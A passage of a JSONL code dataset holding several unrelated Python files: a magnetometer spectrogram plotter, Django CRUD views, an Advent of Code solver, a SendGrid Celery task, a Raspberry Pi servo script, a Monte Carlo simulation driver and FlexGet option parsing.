set_xticks_manually,ReadFromSELFOutputData,ReadDivergenceErrorNorm)\n \n \ndo_TestConvergenceStudyOfSpatialOperators = False\nif do_TestConvergenceStudyOfSpatialOperators:\n TestConvergenceStudyOfSpatialOperators()","sub_path":"tests/DGSEM_Rotating_Shallow_Water_Tests/Test_SpatialOperators.py","file_name":"Test_SpatialOperators.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"643021488","text":"#!/usr/bin/env python2\nimport argparse,datetime,math,matplotlib,mlpy,numpy,os,struct,sys\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom gwpy.plotter import SpectrogramPlot\nfrom gwpy.timeseries import TimeSeries\nfrom matplotlib.ticker import LogLocator\nfrom scipy import fftpack,signal\n\ndef plot_spectrogram(data,tmin=None,tmax=None,fmin=None,fmax=None,vmin=None,vmax=None,\n mmax=None,mmin=None,mode='wavelet',omega0=6,dj=0.05,fct='morlet',\n stride=None,nfft=None,overlap=None,scale='log',\n funit='Hz',tunit='secs',cmap='inferno',zone='Local',fname=None):\n \"\"\"\n Plot multiplot figure with time series, PSD and spectrogram.\n\n Parameters\n ----------\n data : TimeSeries\n Magnetic field data\n tmin, tmax : datetime\n First and last timestamps\n fmin, fmax : float\n Minimum and maximum frequencies\n vmin, vmax : float\n Minimum and maximum color values\n mode : str\n Spectrogram mode, wavelet or Fourier. Default is Fourier\n omega0 : int\n Wavelet function parameter\n dj : float\n Scale resolution (smaller values of dj give finer resolution)\n fct : str\n Wavelet function (morlet,paul,dog)\n stride : float\n Length of segment\n nfft : float\n Length of FFT\n overlap : float\n Length of overlapping segment\n cmap : str\n Colormap\n scale : str\n Plotted frequency scale. Default is \"log\".\n funit : strg\n Frequency unit, Hz or mHz. Default is Hz.\n tunit : str\n Time unit, secs, mins or hrs. Default is mins.\n fname : str\n Output file name.\n \n Notes\n -----\n The `matplotlib.pyplot.imshow <https://matplotlib.org/api/pyplot_api.html?highlight=matplotlib%20pyplot%20imshow#matplotlib.pyplot.imshow>`_ module is\n used to plot the wavelet spectrogram. This module is usually used\n to plot raw images and assumes that the position of the cell in the\n input spectrogram array directly represents the position of the pixel\n in the raw image. That is, for an input Python array (in which rows\n are appended below previous ones), the first row in the array is\n assumed to represent the top line of pixel in the image. Therefore,\n in order to plot the spectrogram array using the imshow module, one\n needs to carefully check that the rows (which are representative of\n the frequency bands), are stored in descending order such that the\n lowest frequency is placed at the end (bottom) of the array.\n \"\"\"\n if mode=='wavelet' and scale=='linear':\n print('Warning: Wavelet mode chosen. Scale will be changed to log.')\n scale = 'log'\n # Initialise figure\n fig = plt.figure(figsize=(24,14),frameon=False)\n plt.subplots_adjust(left=0.07, right=0.95, bottom=0.1, top=0.95, hspace=0, wspace=0)\n ax1 = fig.add_axes([0.20,0.75,0.683,0.20])\n ax2 = fig.add_axes([0.20,0.10,0.683,0.64], sharex=ax1)\n ax3 = fig.add_axes([0.07,0.10,0.123,0.64])\n ax4 = fig.add_axes([0.89,0.10,0.030,0.64])\n # Prepare timing range\n tmin = data.times[0].value if tmin==None else tmin\n tmax = data.times[-1].value if tmax==None else tmax\n mask = (data.times.value>=tmin) & (data.times.value<=tmax)\n scale_factor = 3600. if tunit=='hrs' else 60. if tunit=='mins' else 1\n times = (data[mask].times.value-tmin)/scale_factor\n dt = 1./data.sample_rate.value\n # Plot time series\n ax1.plot(times,data[mask].value,alpha=0.5)\n ax1.set_ylabel('Magnetic Fields [uT]',fontsize=11)\n ax1.tick_params(bottom='off',labelbottom='off')\n if mmin!=None: ax1.set_ylim(ymin=mmin)\n if mmax!=None: ax1.set_ylim(ymax=mmax)\n ax1.set_xlim(0,(tmax-tmin)/scale_factor)\n ax1.grid(b=True, which='major', alpha=0.7, ls='--')\n if mode=='wavelet':\n # Calculate wavelet parameters\n scales = mlpy.wavelet.autoscales(N=len(data[mask].value),dt=dt,dj=dj,wf=fct,p=omega0)\n spec = mlpy.wavelet.cwt(data[mask].value,dt=dt,scales=scales,wf=fct,p=omega0)\n freq = (omega0 + numpy.sqrt(2.0 + omega0 ** 2)) / (4 * numpy.pi * scales[1:])\n freq = freq * 1000. if funit=='mHz' else freq\n spec = numpy.abs(spec)**2\n spec = spec[::-1]\n # Define minimum and maximum frequencies\n fmin_log,fmax_log = min(freq),max(freq)\n fmin_linear,fmax_linear = min(freq),max(freq)\n if fmin!=None:\n log_ratio = (numpy.log10(fmin)-numpy.log10(min(freq)))/(numpy.log10(max(freq))-numpy.log10(min(freq)))\n fmin_linear = min(freq)+log_ratio*(max(freq)-min(freq))\n fmin_log = fmin\n if fmax!=None:\n log_ratio = (numpy.log10(fmax)-numpy.log10(min(freq)))/(numpy.log10(max(freq))-numpy.log10(min(freq)))\n fmax_linear = min(freq)+log_ratio*(max(freq)-min(freq))\n fmax_log = fmax\n # Get minimum and maximum amplitude in selected frequency range\n idx = numpy.where(numpy.logical_and(fmin_log<freq[::-1],freq[::-1]<fmax_log))[0]\n vmin = vmin if vmin!=None else numpy.sort(numpy.unique(spec[idx]))[1]\n vmax = spec[idx].max() if vmax==None else vmax\n # Plot spectrogram\n img = ax2.imshow(spec,extent=[times[0],times[-1],freq[-1],freq[0]],aspect='auto',\n interpolation='nearest',cmap=cmap,norm=matplotlib.colors.LogNorm(vmin,vmax)) \n ax2.set_xlabel('Time [%s] from %s %s (%s)'%(tunit,datetime.utcfromtimestamp(tmin),zone,tmin),fontsize=15)\n ax2.set_xlim(0,(tmax-tmin)/scale_factor)\n ax2.set_yscale('linear')\n ax2.set_ylim(fmin_linear,fmax_linear)\n ax2.grid(False)\n # Set up axis range for spectrogram\n twin_ax = ax2.twinx()\n twin_ax.set_yscale('log')\n twin_ax.set_xlim(0,(tmax-tmin)/scale_factor)\n twin_ax.set_ylim(fmin_log,fmax_log)\n twin_ax.spines['top'].set_visible(False)\n twin_ax.spines['right'].set_visible(False)\n twin_ax.spines['bottom'].set_visible(False)\n ax2.tick_params(which='both', labelleft=False, left=False)\n twin_ax.tick_params(which='both', labelleft=False,left=False, labelright=False, right=False)\n twin_ax.grid(False)\n if mode=='fourier':\n freq, times, spec = signal.spectrogram(data[mask],fs=data.sample_rate.value,\n nperseg=stride,noverlap=overlap,nfft=nfft)\n # Convert time array into minute unit\n times = (numpy.linspace(data[mask].times.value[0],data[mask].times.value[-1],len(times))-tmin)/scale_factor\n # Define minimum and maximum frequencies\n freq = freq * 1000. if funit=='mHz' else freq\n fmin = freq[1] if fmin==None else fmin\n fmax = max(freq) if fmax==None else fmax\n fmin_log,fmax_log = fmin,fmax\n # Get minimum and maximum amplitude in selected frequency range\n idx = numpy.where(numpy.logical_and(fmin<=freq,freq<=fmax))[0]\n vmin = vmin if vmin!=None else numpy.sort(numpy.unique(spec[idx]))[1]\n vmax = spec[idx].max() if vmax==None else vmax\n # Plot spectrogram\n img = ax2.pcolormesh(times,freq,spec,cmap=cmap,norm=matplotlib.colors.LogNorm(vmin,vmax))\n ax2.set_xlabel('Time [%s] from %s %s (%s)'%(tunit,datetime.utcfromtimestamp(tmin),zone,tmin),fontsize=15)\n ax2.set_xlim(0,(tmax-tmin)/scale_factor)\n ax2.set_ylim(fmin,fmax)\n ax2.set_yscale(scale)\n ax2.set_ylabel('Frequency [%s]'%funit,fontsize=15,labelpad=40)\n ax2.tick_params(which='both', labelleft=False, left=False)\n ax2.grid(False)\n # Calculate Power Spectral Density\n N = len(data[mask].value)\n delta_t = 1/data.sample_rate.value\n delta_f = 1. / (N * delta_t)\n f = delta_f * numpy.arange(N / 2)\n f = f * 1000. if funit=='mHz' else f\n PSD = abs(delta_t * fftpack.fft(data[mask].value)[:N / 2]) ** 2\n psd = numpy.vstack((f,PSD)).T\n # Plot Power Spectral Density\n ticks = matplotlib.ticker.FuncFormatter(lambda v,_:(\"$10^{%.0f}$\"%math.log(v,10)))\n ax3.loglog(psd[:,1],psd[:,0],alpha=0.5)\n ax3.invert_xaxis()\n ax3.set_ylim(fmin_log,fmax_log)\n ax3.set_ylabel('Frequency [%s]'%funit,fontsize=15)\n ax3.set_xlabel('PSD',fontsize=15)\n ax3.grid(b=True, which='major', alpha=0.7, ls='--')\n # Add color bar and save figure\n cb = fig.colorbar(img,cax=ax4)\n cb.set_ticks(LogLocator())\n cb.set_clim(vmin,vmax)\n ax4.set_ylabel('Power $|\\mathrm{W}_v|^2$ $[\\mu T^2/\\mathrm{Hz}]$',fontsize=15)\n plt.show() if fname==None else plt.savefig(fname)#,frameon=False)\n plt.close(fig)\n\n# Extract input arguments\nparser = argparse.ArgumentParser(prog='vmr_wavelet',description='Make wavelet from VMR data.')\nparser.add_argument(\"-f\",\"--logfile\",help='Log filename: log.bin',required=True)\nparser.add_argument(\"-r\",\"--rate\", default=None,type=float,help='Targeted sampling rate')\nparser.add_argument(\"-o\",\"--out\", default='wavelet.png',help='Output figure name')\nparser.add_argument(\"--tmin\", default=None,type=float,help='Start timestamp')\nparser.add_argument(\"--tmax\", default=None,type=float,help='End timestamp')\nparser.add_argument(\"--mmin\", default=None,type=float,help='Minimum magnetic field')\nparser.add_argument(\"--mmax\", default=None,type=float,help='Maximum magnetic field')\nparser.add_argument(\"--ufactor\", default=1.,type=float,help='Factor from local to uT')\nargs = parser.parse_args()\n# Read binary file and store floating values in numpy array\nwith open(args.logfile,'rb') as f:\n data = f.read()\n size = int(len(data)/32)\n data = struct.unpack('dddd'*size,data)\n data = numpy.reshape(data,(size,4))\n# Identify samples to discard\nif args.tmin!=None:\n idxs = numpy.where(data[:,0]<args.tmin)[0]\n data = numpy.delete(data,idxs,axis=0)\nif args.tmax!=None:\n idxs = numpy.where(data[:,0]>args.tmax)[0]\n data = numpy.delete(data,idxs,axis=0)\n# Check targeted sampling rate if mentioned\nsample_rate = int(1/numpy.average([data[i+1,0]-data[i,0] for i in range(len(data)-1)]))\ntarget_rate = float(sample_rate) if args.rate==None else float(args.rate)\ndownsampling = sample_rate/target_rate\nif (downsampling).is_integer()==False:\n print(\"ERROR: Data sampling rate (%i) not divisible by targeted rate (%i)\"%(sample_rate,target_rate))\n quit()\n# Print out first and last timestamp values\ntimes = data[:,0]\ndate0 = datetime.fromtimestamp(times[0]).strftime('%Y-%m-%d %H:%M:%S.%f')\ndate1 = datetime.fromtimestamp(times[-1]).strftime('%Y-%m-%d %H:%M:%S.%f')\nprint(len(data),'data points were streamed from %s to %s'%(date0,date1))\n# Calculate scalar value of magnetic field for each sample\nscalar = numpy.sqrt(numpy.sum(abs(data[:,1:]/args.ufactor)**2,axis=1))\nscalar = signal.resample(scalar,int(len(scalar)/downsampling))\nprint('Data are resampled by a factor',downsampling,'from',sample_rate,'down to',target_rate,'sample/sec.')\n# Store data into GwPy time series format\ndata = TimeSeries(scalar,sample_rate=target_rate,epoch=times[0])\n# Plot wavelet spectrogram\ntmin = times[0] if args.tmin==None else args.tmin\ntmax = times[-1] if args.tmax==None else args.tmax\nmmin = min(data.value) if args.mmin==None else args.mmin\nmmax = max(data.value) if args.mmax==None else args.mmax\nname = 'wavelet_%i-%i'%(tmin,tmax) if args.out==None else args.out\nplot_spectrogram(data,fname=name,tunit='mins',tmin=tmin,tmax=tmax,mmin=mmin,mmax=mmax)\n","sub_path":"bin/vmr_wavelet.py","file_name":"vmr_wavelet.py","file_ext":"py","file_size_in_byte":11347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"328886433","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.template.loader import get_template\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom lister.models import Info\nfrom lister.models import Client\nfrom lister.models import Type\nimport ipaddress\nfrom django.core.validators import URLValidator\nfrom django.core.exceptions import ValidationError\n\n# Tableau des clés\nclass UpdateView(TemplateView):\n template_name = 'update.html'\n def get(self, request, **kwargs):\n info = Info.objects.all()\n client = Client.objects.all()\n type = Type.objects.all()\n return render(request, self.template_name, {'info' : info, 'client': client, 'type' : type})\n\nclass AddView(TemplateView):\n template_name = 'add.html'\n def get(self, request, **kwargs):\n info = Info.objects.all()\n client = Client.objects.all()\n type = Type.objects.all()\n return render(request, self.template_name, {'info' : info, 'client': client, 'type' : type})\n\nclass PleaseLog(TemplateView):\n def get(self, request, **kwargs):\n messages.error(request, 'Veuillez vous connecter')\n return HttpResponseRedirect( settings.LOGIN_REDIRECT_URL )\n# Connexion\nclass LoginView(TemplateView):\n template_name = 'index.html'\n\n def post(self, request, **kwargs):\n username = request.POST.get('username', False)\n password = request.POST.get('password', False)\n user = authenticate(username=username, password=password)\n if user is not None and user.is_active:\n login(request, user)\n messages.success(request, 'Connexion réussie')\n return HttpResponseRedirect( settings.LOGIN_REDIRECT_URL )\n else:\n messages.error(request, 'Mot de passe incorrect')\n return HttpResponseRedirect( settings.LOGIN_REDIRECT_URL )\n return render(request, self.template_name)\n def get(self, request, **kwargs):\n info = Info.objects.all()\n client = Client.objects.all()\n type = Type.objects.all()\n return render(request, self.template_name, {'info' : info, 'client': client, 'type' : type})\n\nclass DeleteInfo(TemplateView):\n template_name = 'index.html'\n def post(self, request, **kwargs):\n infoid = request.POST.get('info_id', False)\n Info.objects.filter(id=infoid).delete()\n messages.success(request, \"L'info a bien été supprimée\")\n return HttpResponseRedirect( \"/update/\" )\n\nclass UpdateInfo(TemplateView):\n template_name = 'index.html'\n def post(self, request, **kwargs):\n ip = request.POST.get('ip', False) \n try:\n ipaddress.ip_address(ip)\n except:\n messages.error(request, 'Mauvais format IP')\n return HttpResponseRedirect( \"/update/\" )\n url = request.POST.get('url', False)\n try:\n URLValidator()(url)\n except:\n messages.error(request, 'Mauvaise URL')\n return HttpResponseRedirect( \"/update/\" ) \n clientnom = request.POST.get('client', False)\n hostname = request.POST.get('hostname', False)\n typenom = request.POST.get('type', False)\n try:\n clientid = Client.objects.get(nom=clientnom).id\n typeid = Type.objects.get(nom=typenom).id\n except:\n messages.error(request, 'Mauvais client ou type')\n return HttpResponseRedirect( \"/update/\" )\n formid = request.POST.get('formid', False)\n try:\n Info.objects.filter(id=formid).update(url=url, ip=ip, cli_id=clientid, typ_id = typeid, hostname=hostname)\n messages.success(request, \"L'info a bien été modifiée\")\n return HttpResponseRedirect( \"/update/\" )\n except:\n messages.error(request, \"Impossible de mettre a jour l'info\")\n return HttpResponseRedirect( \"/update/\" )\n\nclass AjouterType(TemplateView):\n template_name = \"index.html\"\n def post(self, request, **kwargs):\n typenom = request.POST.get('type', False)\n try:\n t = Type(nom=typenom)\n t.save()\n messages.success(request, 'Le type a bien été ajouté')\n return HttpResponseRedirect( \"/add/\" )\n except:\n messages.error(request, \"Impossible de créer un type\")\n return HttpResponseRedirect( \"/add/\" )\n\nclass AjouterClient(TemplateView):\n template_name = \"index.html\"\n def post(self, request, **kwargs):\n clientnom = request.POST.get('client', False)\n try:\n c = Client(nom=clientnom)\n c.save()\n messages.success(request, 'Le client a bien été ajouté')\n return HttpResponseRedirect( \"/add/\" )\n except:\n messages.error(request, \"Impossible de créer un client\")\n return HttpResponseRedirect( \"/add/\" )\n\nclass AjouterInfo(TemplateView):\n template_name = \"index.html\"\n def post(self, request, **kwargs):\n ip = request.POST.get('ip', False) \n try:\n ipaddress.ip_address(ip)\n except:\n messages.error(request, 'Mauvais format IP')\n return HttpResponseRedirect( \"/add/\" )\n url = request.POST.get('url', False)\n try:\n URLValidator()(url)\n except:\n messages.error(request, 'Mauvaise URL')\n return HttpResponseRedirect( \"/add/\" ) \n clientnom = request.POST.get('client', False)\n hostname = request.POST.get('hostname', False)\n typenom = request.POST.get('type', False)\n try:\n clientid = Client.objects.get(nom=clientnom).id\n typeid = Type.objects.get(nom=typenom).id\n except:\n messages.error(request, \"Mauvais client ou type\")\n return HttpResponseRedirect( \"/add/\" )\n try:\n i = Info(ip=ip, hostname=hostname, url=url, cli_id = clientid, typ_id = typeid)\n i.save()\n messages.success(request, \"L'info a bien été ajoutée\")\n return HttpResponseRedirect( \"/add/\" )\n except:\n messages.error(request, \"Impossible de créer une info\")\n return HttpResponseRedirect( \"/add/\" )\n# Déconnexion\nclass LogoutView(TemplateView):\n template_name = 'index.html'\n\n def get(self, request, **kwargs):\n logout(request)\n return HttpResponseRedirect( settings.LOGIN_REDIRECT_URL )\n","sub_path":"lister/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"35261228","text":"import day01\n\ndef get_delta(a_dir):\n dirs = {'L': (-1, 0), 'U': (0, 1), 'R': (1, 0), 'D': (0, -1)}\n try:\n return dirs[a_dir]\n except KeyError:\n print(f'Unknown direction {a_dir}')\n\ndef all_cable_coordinates(cable_dirs, a_start=(0, 0)):\n coords = [a_start]\n\n for cd in cable_dirs:\n last_coord = coords[-1]\n my_delta = get_delta(cd[0])\n distance = int(cd[1:])\n coords += [(last_coord[0]+my_delta[0]*j, last_coord[1]+my_delta[1]*j) for j in range(1, distance+1)]\n\n return coords\n\ndef prep(content):\n cable1 = content[0].split(',')\n cable2 = content[1].split(',')\n cable1_coords = all_cable_coordinates(cable1)\n cable2_coords = all_cable_coordinates(cable2)\n # find shared coordinates\n shared = list(set(cable1_coords) & set(cable2_coords))\n shared.pop(shared.index((0, 0)))\n return cable1_coords, cable2_coords, shared\n\ndef part1(cable1_coords, cable2_coords, shared):\n min_manhatten = 10e10\n for x in shared:\n man = abs(x[0])+abs(x[1])\n if man < min_manhatten:\n min_manhatten = man\n print(f'Part 1: Minimum distance of crossing point: {min_manhatten}')\n\ndef part2(cable1_coords, cable2_coords, shared):\n min_steps = 10e10\n for x in shared:\n idx1 = cable1_coords.index(x)\n idx2 = cable2_coords.index(x)\n if idx1 + idx2 < min_steps:\n min_steps = idx1 + idx2\n print(f'Part 2: Minimum combined steps: {min_steps}')\n","sub_path":"2019/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"437345576","text":"from celery import Celery\nimport time\nimport sendgrid\nimport os\nfrom sendgrid.helpers.mail import *\n\n\napp = Celery('tasks', broker='redis://192.168.118.130:6379/0',\n backend=\"redis://192.168.118.130:6379/0\")\n\n\n@app.task\ndef send_mail(email):\n sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))\n from_email = Email(\"18804928235@163.com\")\n to_email = Email(email)\n subject = \"Sending with SendGrid is Fun\"\n content = Content(\"text/plain\", \"and easy to do anywhere, even with Python\")\n mail = Mail(from_email, subject, to_email, content)\n response = sg.client.mail.send.post(request_body=mail.get())\n print(response.status_code)\n print(response.body)\n print(response.headers)\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"474801159","text":"import RPi.GPIO as GPIO\nimport time\nimport signal\nimport atexit\n\natexit.register(GPIO.cleanup)\n\nGPIO.setmode(GPIO.BOARD)\n\nGPIO.setup(11,GPIO.OUT)\n#GPIO.setup(11,GPIO.IN)\nGPIO.output(11, False)\n\np = GPIO.PWM(11, 50)\np.start(9)\ntime.sleep(2)\n\nwhile(True):\n\tfor i in range(0,181,10):\n\t\tp.ChangeDutyCycle(2.5 + 10 * i / 180)\n\t\ttime.sleep(0.02)\n\t\tp.ChangeDutyCycle(0)\n\t\ttime.sleep(0.2)\n \n\tfor i in range(181,0,-10):\n\t\tp.ChangeDutyCycle(2.5 + 10 * i / 180)\n\t\ttime.sleep(0.02)\n\t\tp.ChangeDutyCycle(0)\n\t\ttime.sleep(0.2)\n","sub_path":"SG90.py","file_name":"SG90.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"408824987","text":"# Functions for running Monte Carlo algorithm\n\nimport numpy as np\nimport pandas as pd\nimport multiprocessing as mp\nimport os\nimport sys\n\nimport time\nimport datetime\n\ndef write(logfile, msg):\n \"\"\"\n Write to both sys.stdout and to a logfile.\n \"\"\"\n logfile = open(logfile.name, 'a+')\n logfile.write(msg)\n sys.stdout.write(msg)\n sys.stdout.flush()\n logfile.close()\n\ndef multilevel_mc(path, qin, qout):\n \"\"\"\n In this function the XBeach model is run\n \"\"\"\n os.chdir(path)\n for (nf, lmax, lmin, normalisation_factor, build_output, sigma_function, variable_name, interp_fn_orig, angles_fn, instat_type) in iter(qin.get, 'stop'):\n sigma = sigma_function()\n outputf = build_output(path, nf, sigma, variable_name, interp_fn_orig, angles_fn, lmax, lmin, instat_type, normalisation_factor)\n\n qout.put(outputf)\n\n\ndef _parallel_mc_mc(processes, path_stem, calc_formula, nf, lmax, lmin, normalisation_factor, build_output, variable_name, sigma_function, interp_fn_orig, angles_fn, instat_type, iteration):\n\n \"\"\"\n Split the tasks so the algorithm be parallelised and then collect the parallel output\n \"\"\"\n \n # putting runs into queue\n in_queue = mp.Queue()\n out_queue = mp.Queue()\n future_res = []\n for i in range(processes):\n path = path_stem + str(i) + '/'\n if not os.path.exists(path):\n os.makedirs(path)\n \n future_res.append(mp.Process(target = calc_formula, args = (path, in_queue, out_queue)))\n future_res[-1].start()\n\n for j in range(iteration):\n if (j+1)%1000 == 0:\n print(j)\n in_queue.put((nf, lmax, lmin, normalisation_factor, build_output, sigma_function, variable_name, interp_fn_orig, angles_fn, instat_type))\n # send stop signals\n for i in range(processes):\n in_queue.put('stop')\n \n # collect output \n results = []\n for i in range(iteration):\n if (i+1)%1000 == 0:\n print(i)\n results.append(out_queue.get())\n\n outputf = [f for f in results]\n \n return outputf\n\n\n\ndef monte_carlo_main(N0, nf, lmax, lmin, normalisation_factor, build_output, path_stem, sample, variable_name, processes, interp_fn_orig, angles_fn, instat_type):\n \n \"\"\"\n Runs Monte Carlo algorithm\n \n N0: number of samples\n nf: number of meshgrid points\n lmax: maximum level considered by MLMC algo\n lmin: minimum level comsidered by MLMC algo\n normalisation_factor: factor by which the output is divided by\n build_output: function which defines the XBeach inputs files, runs XBeach and outputs results\n path_stem: location where XBeach input and output files are dumped\n sample: function used to generate random number\n variable_name: name of uncertain parameter\n processes: number of parallel runs\n interp_fn_orig: interpolation function used to generate new beds for different x and y grids\n angles_fn: interpolation function used to store bed angle for all values of y\n instat_type: wavetype used\n \n \"\"\"\n\n ts = time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n \n # output file of key stats\n filename = \"monte_carlo_real_answer_bedslope_\" + st + \".txt\"\n logfile = open(filename, \"w+\")\n logfile.close()\n\n\n t0 = time.time()\n # run MC algorithm\n outputf = _parallel_mc_mc(processes, path_stem, multilevel_mc, nf, lmax, lmin, normalisation_factor, build_output, variable_name, sample, interp_fn_orig, angles_fn, instat_type, N0)\n \n t1 = time.time()\n \n # csv of all MC samples from this run\n csv_name = \"average_output_\" + st + \".csv\"\n\n pd.DataFrame(outputf).to_csv(csv_name, index = False)\n \n logfile = open(filename, \"a+\")#, 0)\n\n write(logfile, \"Number of samples: %0d \" % N0)\n write(logfile, \"Total time: %f \" % (t1-t0))\n write(logfile, \"Monte Carlo real value: %f \" % (np.mean(outputf)))\n write(logfile, \"Monte Carlo error: %f \" % (np.sqrt(np.var(outputf)/len(outputf))))\n\n logfile.close()\n\n print('total time: ' + str(t1 - t0))\n print('expected value: ' + str(np.mean(outputf)))\n\n\n return np.mean(outputf), np.sqrt(np.var(outputf)/len(outputf)), filename\n","sub_path":"morphological_files/monte_carlo_fn.py","file_name":"monte_carlo_fn.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"161814282","text":"from __future__ import unicode_literals, division, absolute_import\nimport sys\nfrom argparse import ArgumentParser as ArgParser, Action, ArgumentError, SUPPRESS, _VersionAction\n\nimport flexget\nfrom flexget.utils.tools import console\nfrom flexget.utils import requests\n\n\ndef required_length(nmin, nmax):\n \"\"\"Generates a custom Action to validate an arbitrary range of arguments.\"\"\"\n class RequiredLength(Action):\n def __call__(self, parser, args, values, option_string=None):\n if not nmin <= len(values) <= nmax:\n raise ArgumentError(self, 'requires between %s and %s arguments' % (nmin, nmax))\n setattr(args, self.dest, values)\n return RequiredLength\n\n\nclass VersionAction(_VersionAction):\n \"\"\"\n Action to print the current version.\n Also attempts to get more information from git describe if on git checkout.\n \"\"\"\n def __call__(self, parser, namespace, values, option_string=None):\n self.version = flexget.__version__\n # Print the version number\n console('%s' % self.version)\n if self.version == '{git}':\n console('To check the latest released version you have run:')\n console('`git fetch --tags` then `git describe`')\n else:\n # Check for latest version from server\n try:\n page = requests.get('http://download.flexget.com/latestversion')\n except requests.RequestException:\n console('Error getting latest version number from download.flexget.com')\n else:\n ver = page.text.strip()\n if self.version == ver:\n console('You are on the latest release.')\n else:\n console('Latest release: %s' % ver)\n parser.exit()\n\n\nclass DebugAction(Action):\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, True)\n namespace.log_level = 'debug'\n\n\nclass DebugTraceAction(Action):\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, True)\n namespace.debug = True\n namespace.log_level = 'trace'\n\n\nclass CronAction(Action):\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, True)\n namespace.loglevel = 'info'\n\n\nclass CoreArgumentParser(ArgParser):\n \"\"\"Overrides some default ArgumentParser behavior\"\"\"\n\n def __init__(self, **kwargs):\n # Do this early, so even option processing stuff is caught\n if '--bugreport' in sys.argv:\n self._debug_tb_callback()\n\n ArgParser.__init__(self, **kwargs)\n\n def error(self, message):\n \"\"\"Overridden error handler to print help message\"\"\"\n sys.stderr.write('error: %s\\n' % message)\n self.print_help()\n sys.exit(2)\n\n def add_argument(self, *args, **kwargs):\n if isinstance(kwargs.get('nargs'), basestring) and '-' in kwargs['nargs']:\n # Handle a custom range of arguments\n min, max = kwargs['nargs'].split('-')\n min, max = int(min), int(max)\n kwargs['action'] = required_length(min, max)\n # Make the usage string a bit better depending on whether the first argument is optional\n if min == 0:\n kwargs['nargs'] = '*'\n else:\n kwargs['nargs'] = '+'\n super(CoreArgumentParser, self).add_argument(*args, **kwargs)\n\n def parse_args(self, args=None, namespace=None):\n if args is None:\n # Decode all arguments to unicode before parsing\n args = [unicode(arg, sys.getfilesystemencoding()) for arg in sys.argv[1:]]\n return super(CoreArgumentParser, self).parse_args(args, namespace)\n\n def _debug_tb_callback(self, *dummy):\n import cgitb\n cgitb.enable(format=\"text\")\n\n\ncore_parser = CoreArgumentParser()\n\ncore_parser.add_argument('-V', '--version', action=VersionAction, help='Print FlexGet version and exit.')\ncore_parser.add_argument('--test', action='store_true', dest='test', default=0,\n help='Verbose what would happen on normal execution.')\ncore_parser.add_argument('-c', dest='config', default='config.yml',\n help='Specify configuration file. Default is config.yml')\ncore_parser.add_argument('--logfile', default='flexget.log',\n help='Specify a custom logfile name/location. '\n 'Default is flexget.log in the config directory.')\n# TODO: rename dest to cron, since this does more than just quiet\ncore_parser.add_argument('--cron', action=CronAction, dest='quiet', default=False, nargs=0,\n help='Use when scheduling FlexGet with cron or other scheduler. Allows background '\n 'maintenance to run. Disables stdout and stderr output. Reduces logging level.')\n# This option is already handled above.\ncore_parser.add_argument('--bugreport', action='store_true', dest='debug_tb',\n help='Use this option to create a detailed bug report, '\n 'note that the output might contain PRIVATE data, so edit that out')\n# provides backward compatibility to --cron and -d\ncore_parser.add_argument('-q', '--quiet', action=CronAction, dest='quiet', default=False, nargs=0,\n help=SUPPRESS)\ncore_parser.add_argument('--debug', action=DebugAction, nargs=0, help=SUPPRESS)\ncore_parser.add_argument('--debug-trace', action=DebugTraceAction, nargs=0, help=SUPPRESS)\ncore_parser.add_argument('--loglevel', default='verbose',\n choices=['none', 'critical', 'error', 'warning', 'info', 'verbose', 'debug', 'trace'],\n help=SUPPRESS)\ncore_parser.add_argument('--debug-sql', action='store_true', default=False, help=SUPPRESS)\ncore_parser.add_argument('--experimental', action='store_true', default=False, help=SUPPRESS)\ncore_parser.add_argument('--del-db', action='store_true', dest='del_db', default=False, help=SUPPRESS)\ncore_parser.add_argument('--profile', action='store_true', default=False, help=SUPPRESS)\ncore_parser.add_argument('--log-start', action='store_true', dest='log_start', default=0, help=SUPPRESS)\n\ncore_subparsers = core_parser.add_subparsers(title='Commands', metavar='<command>', dest='subcommand')\n\nexec_parser = core_subparsers.add_parser('exec', help='execute tasks now')\n\nexec_parser.add_argument('--check', action='store_true', dest='validate', default=0,\n help='Validate configuration file and print errors.')\nexec_parser.add_argument('--learn', action='store_true', dest='learn', default=0,\n help='Matches are not downloaded but will be skipped in the future.')\n# Plugins should respect these flags where appropriate\nexec_parser.add_argument('--retry', action='store_true', dest='retry', default=0, help=SUPPRESS)\nexec_parser.add_argument('--no-cache', action='store_true', dest='nocache', default=0,\n help='Disable caches. Works only in plugins that have explicit support.')\n\n\ndef add_subparser(name, func, **kwargs):\n subparser = core_subparsers.add_parser(name, **kwargs)\n subparser.set_defaults(func=func)\n return subparser\n\n\ndef get_subparser(name):\n core_subparsers.choices.get(name)\n","sub_path":"flexget/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":7364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"307272688","text":"from keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.image as mpimg\nimport os.path\nimport numpy as np\nimport os\nimport 